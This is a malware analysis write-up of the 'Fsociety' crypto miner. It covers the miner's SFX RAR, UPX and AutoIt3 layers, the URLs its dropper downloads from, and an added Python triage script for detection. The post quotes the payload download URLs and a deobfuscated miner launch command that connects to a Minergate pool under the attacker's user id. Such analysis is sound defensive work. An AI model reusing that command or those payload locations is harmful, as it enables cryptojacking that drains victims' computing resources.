Ring Ø Labs DOES NOT advocate using any of the malware, techniques, or information presented here for harm and doing so may violate the law. These topics are for mitigation and educational purposes only.

Sunday, July 30, 2017

To Kill The Mocking Porn - Fsociety Crypto Miner


Fsociety is a crypto miner that hides behind multiple layers of obfuscation, Russian porn sites, and trickery. Enjoy the ride :)






WARNING:
USE OF INFORMATION IN THIS REPORT FOR ANY ACTION AGAINST A MACHINE WITHOUT THE OWNER'S CONSENT MAY VIOLATE THE LAW.

DETAILS

Filename: fsociety_soft.exe
Protection: Self-Extracting RAR / UPX / AutoIt3
MD5: dfafd55bc9a0e84eafada04a5f21aead
Type: Crypto Miner



INTRODUCTION


Fsociety_soft.exe either pays homage to fsociety from the TV show Mr. Robot or poses as some kind of legitimate fan application; regardless, the application is certainly dangerous.


ANALYSIS


We begin by extracting the main executable, which is a self-extracting RAR archive. The extracted file is named WINDOWS.exe and is itself another self-extracting RAR archive (RAR-ception).

The file extracted from the second archive is also named WINDOWS.exe and is UPX packed. Unpacking it reveals the final launcher and its embedded AutoIt3 script.



Once running, WINDOWS.exe connects to iplogger.com; if the connection cannot be made, the program exits. This is most likely an anti-analysis check, and it is easily bypassed by setting up rules that allow traffic to the domain or by simply responding with what the malware expects from the site.
Once connectivity is confirmed, WINDOWS.exe connects to the following .RU domain and downloads additional files:

http://porntovirt.ru/075/Security.exe
http://porntovirt.ru/075/system.exe
http://porntovirt.ru/075/1.bat


At the time of this analysis the only file hosted on the domain was 1.bat; the other two files did not exist.



Performing a directory traversal back to the main page we are greeted with the following (blurred for article):


Clicking the button at the bottom of the page we are then greeted with the following (blurred for article):





Again, clicking the button brings us to the final location, which redirects to a Google Drive file that no longer exists. This could be a remnant of a past attack that hosted a malicious file.





Porn site detour aside, 1.bat is a heavily obfuscated batch file that is responsible for launching the crypto mining software.



Deobfuscating this VERY long script essentially boils down to the following command:

C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k

This launches two instances of the mining software (the command is repeated) and connects to the MINERGATE bitcoin mining pool. The -u argument is the USERID of the individual to whom the mined coins are credited: lemoh4uk.sagmail.com.

When running at full capacity, the two mining processes consume significant system resources, as shown by this graph taken immediately after infection:



DETECTION



There are many VirusTotal detections for the later stages of this file (after the archive is extracted and the payload is unpacked from UPX). The best mitigation for the early stages of this malware is to disallow self-extracting RAR files and quarantine anything UPX packed; there is no reason to have either in a business environment.
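As an added example (not code from the original write-up), the following Python triage script applies the layering described in the analysis and the mitigation above: it flags PE images that carry an appended RAR archive, UPX section names, or a compiled AutoIt3 marker, and parses the deobfuscated miner command line for its pool and user id. The signatures are public format constants and the sample blobs are constructed stand-ins, not the real files.

```python
import re
from typing import Dict, List, Optional
# Public format signatures for the layers the analysis unpacks (SFX RAR ->
# UPX -> AutoIt3); none of these values come from the fsociety sample itself.
RAR4_SIG = b"Rar!\x1a\x07\x00"       # RAR 1.5 - 4.x archive header
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"   # RAR 5.x archive header
UPX_SECTIONS = (b"UPX0", b"UPX1")     # section names written by the UPX packer
AU3_MARKER = b"AU3!EA06"              # marker of a compiled AutoIt3 script

# Deobfuscated launcher command quoted in the analysis above.
DEOBFUSCATED_CMD = (
    r"C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560"
    " --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k"
)
STRATUM_RE = re.compile(
    r"-o\s+stratum\+tcp://(?P<host>[\w.-]+):(?P<port>\d+).*?-u\s+(?P<user>\S+)"
)

def classify_blob(data: bytes) -> List[str]:
    """Name the packing layers visible in a PE image by byte signature."""
    findings = []
    if not data.startswith(b"MZ"):        # only PE images are of interest here
        return findings
    # An SFX is a PE stub with the RAR archive appended, so the RAR header sits past the DOS header.
    if RAR4_SIG in data[2:] or RAR5_SIG in data[2:]:
        findings.append("sfx-rar")
    if any(name in data for name in UPX_SECTIONS):
        findings.append("upx")
    if AU3_MARKER in data:
        findings.append("autoit3")
    return findings

def extract_miner_config(cmdline: str) -> Optional[Dict[str, str]]:
    """Pull pool host, port and user id out of a stratum miner command line."""
    match = STRATUM_RE.search(cmdline)
    return match.groupdict() if match else None

# Constructed stand-ins for the unpacking stages (not the real files).
SAMPLES = {
    "stage1_sfx": b"MZ" + b"\x00" * 62 + RAR4_SIG + b"<archive bytes>",
    "stage3_upx": b"MZ" + b"\x00" * 62 + b"UPX0" + b"\x00" * 36 + b"UPX1",
    "stage4_unpacked": b"MZ" + b"\x00" * 62 + b".text\x00\x00\x00" + AU3_MARKER,
    "clean": b"MZ" + b"\x00" * 62 + b".text\x00\x00\x00.rdata",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name}: {classify_blob(blob)}")
    print(extract_miner_config(DEOBFUSCATED_CMD))
```

Running the script over the constructed blobs labels each stage with the layer it exposes, and the command-line parser yields the pool host, port and user id that a blocklist or alert would key on.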

CONCLUSION


Fsociety is a crypto miner that hides behind multiple layers of obfuscation, porn sites, and trickery. The initial stages of obfuscation should be blocked by most businesses; be sure to check AlienVault's IOCs for additional blocking.